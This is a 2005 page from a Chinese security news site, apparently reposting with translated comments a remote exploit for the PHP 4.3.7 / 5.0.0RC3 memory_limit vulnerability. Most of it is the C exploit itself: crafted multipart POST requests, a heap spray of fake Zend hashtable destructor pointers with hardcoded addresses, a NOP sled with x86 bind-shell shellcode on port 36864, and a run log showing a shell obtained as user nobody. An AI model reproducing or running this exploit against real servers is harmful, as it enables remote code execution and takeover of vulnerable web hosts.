PHP4.3.7内存限制漏洞利用程序演示版 - 爱国者安全网新闻中心

通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码

电信 ┊ 网通 ┊ 铁通 ┊ 移动　

在线人

文章搜索：

热门搜索：红客黑鹰红客技术安全动画红客培训

　业内新闻漏洞公告病毒公告电脑知识网络知识菜鸟入门攻防教程黑客攻防安全编程工具使用综合安全个人安全安全相关 Q Q安全原创精华红客人物站内事件

您现在的位置：爱国者安全网 >> 新闻类 >> 最新公告 >> 漏洞公告 >> 文章正文

PHP4.3.7内存限制漏洞利用程序演示版

责任编辑：stef 　更新日期：2005-7-6

php内存限制漏洞远程利用程序,影响版本PHP(<=4.3.7) and php (<5.0.ORC3).
文章翻译： QQ：56111981（小华） www.hackbase.com

程序在PHP4.3.7+APACHE2.0.49条件下运行正常，但不是最佳解决方式。

原档下载地：http://www.felinemenace.org/~gyan/phpnolimit.c

文章做了简单的翻译，可能有不足之处，看英文原档。
["phpnolimit.c" (text/plain)]
/*

PHP内存限制漏洞远程利用程序，影响版本 php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3).
作者：Gyan Chawdhary
攻击原理：

程序中首先提交一个假的ZEND散列，在系统为散列分配空间并初始化后提交第二个请求破坏内存。第一次请求中包含了指向第二次请求数据的指针（译者注：这是经过精心构造的数据，第二次请求内存存放地址已经计算好了），第二次请求中的部分数据是NOP+SHELLCODE。第一次请求数据被系统用到以后，指向SHELLCODE，就达到溢出的目的了。

程序不足之处：

目前无法找到一种方式来释放40字节内存块，这40字节随后被ALLOC_HASHTABLE利用。如果有人能解决这个问题，请联系作者Gyan Chawdhary（gunnu45@hotmail.com）。

代码如下（代码中部分不翻译，有需要的联系我)：

*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>

#define IP "127.0.0.1"
#define PORT 80
int sock;
struct sockaddr_in s;

char request1[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=------------ \r\n
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
\r\n";

char request2[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"\r\n"
"-----------------------------264122487026375--\r\n";

char request3[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=-------------";

char request4[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"-----------------------------264122487026375--\r\n";

/*Ripped shellcode. Runs on port 36864*/
char shell[]=
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";

void xp_connect(char *ip)
{
        char buffer[1024];
        char temp[1024];
        int tmp;

        s.sin_family = AF_INET;
        s.sin_port = htons(PORT);
        s.sin_addr.s_addr = inet_addr(ip);

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
                printf("Cannot create socket\n");
                exit(-1);
        }

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) <
0)
        {
                printf("Cannot connect()\n");
                exit(-1);
        }
}

void xp_write(char *data)
{

        if(write (sock, data, strlen(data)) < 0)
        {
         printf("write() failed\n");
         exit(-1);
        }
}

void xp_receive()
{
        int tmp;
        char buffer[1024*2];

if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)
        {
               printf("read() failed\n");
               exit(-1);
        }
}

char fill[] = " \r\n %s \r\n ";

/*This function builds the main request. In destroy_uploaded_files_hash we
* need to pass zend_hash_apply to reach zend_hash_destroy.
* We set
* 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION
* 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply
* 3) ht->pDestructor = addr to nop+shellcode
* 0x402c22bc <zend_hash_destroy+184>:     sub    $0xc,%esp
* 0x402c22bf <zend_hash_destroy+187>:     pushl  0x8(%esi)
* 0x402c22c2 <zend_hash_destroy+190>:     call   *%eax
* 0x402c22c4 <zend_hash_destroy+192>:     add    $0x10,%esp
*
* $eax = ht->pDestructor
*/

void build1(int size, int count)
{
        char *p1, *p2;
        char *b1, *b2;
        int i;
int pot = 0xffffffff;
int got = 0x41414141;
int bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;
int sot = 0x02020202;
int ret = 0x081887a8;

b1 = (char *)malloc(size-8);
                p1 = b1;

for (i=0; i<size-8; i+=36)
{
*( (int **)p1 ) = (int *)( pot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( ret );
                p1+=4;
                *( (int **)p1 ) = (int *)( bot );
                p1+=4;
*( (int **)p1 ) = (int *)( got );
        p1+=4;
        *( (int **)p1 ) = (int *)( bot );
        p1+=4;
*( (int **)p1 ) = (int *)( sot );
p1+=4;
}

        b2 = (char *)malloc(size+1);
        p2 = b2;

sprintf(p2, fill, b1);

        for(i=0; i<count; i++)
                xp_write(b2);
}

/*Test function for resetting php memory , does not work properly with
* php_normalize_heap function */
void build2(int size, int count)
{
               char *p1, *p2;
               char *b1, *b2;
               int i;
               b1 = (char *)malloc(size-8);
               p1 = b1;
               memset(p1, '\x42', size-8);
               b2 = (char *)malloc(size+1);
               p2 = b2;
               sprintf(p2, fill, b1);
               for(i=0; i<count; i++)
               xp_write(b2);
}

/*TODO*/
char *php_normalize_heap()
{
return;
}

/*Builds our shellcode with NOP's and the mem interuption request*/

void build3(int size, int count)
{
               char *p1, *p2;
               char *b1, *b2;
               int i;
               int pot = 0x90909090;

       b1 = (char *)malloc(size-8);
               p1 = b1;

         for (i=0; i<size-8-strlen(shell); i+=4) {
       *( (int **)p1 ) = (int *)( pot );
                p1+=4;
                }
p1 = b1;

p1+= size - 8 - strlen(shell);
strncpy(p1, shell, strlen(shell));

              b2 = (char *)malloc(size+1);
               p2 = b2;

                sprintf(p2, fill, b1);

                for(i=0; i<count; i++)
                xp_write(b2);
      }

void exploit()
{

int i;

printf("Stage 1: Filling mem with bad pdestructor ... ");
for (i=0; i< 5; i++)
{
       xp_connect(IP);
           xp_write(request1);
             build1(5000, 1);
             xp_write(request2);
     close(sock);
}
printf("DONE\r\n");
printf("Stage 2: Triggering memory_limit now ... ");

xp_connect(IP);
        xp_write(request3);
        build3(8192, 255);
        build3(7265, 1);
        xp_write(request4);
printf("DONE\r\n");
printf("Shell on port 36864\r\n");

}

main()
{
/*No args, no vectors*/
exploit();
}

测试：

[root@localhost stuff]# ./cool
Stage 1: Filling mem with bad pdestructor ... DONE
Stage 2: Triggering mem_limit now ... DONE
Shell on port 36864
[root@localhost stuff]# telnet 127.0.0.1 36864
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=99(nobody) gid=4294967295 groups=4294967295
uname -a;
Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686
i686 i386 GNU/Linux

上一篇文章：没有了

下一篇文章：微软证实WINS存在安全漏洞正赶制安全补丁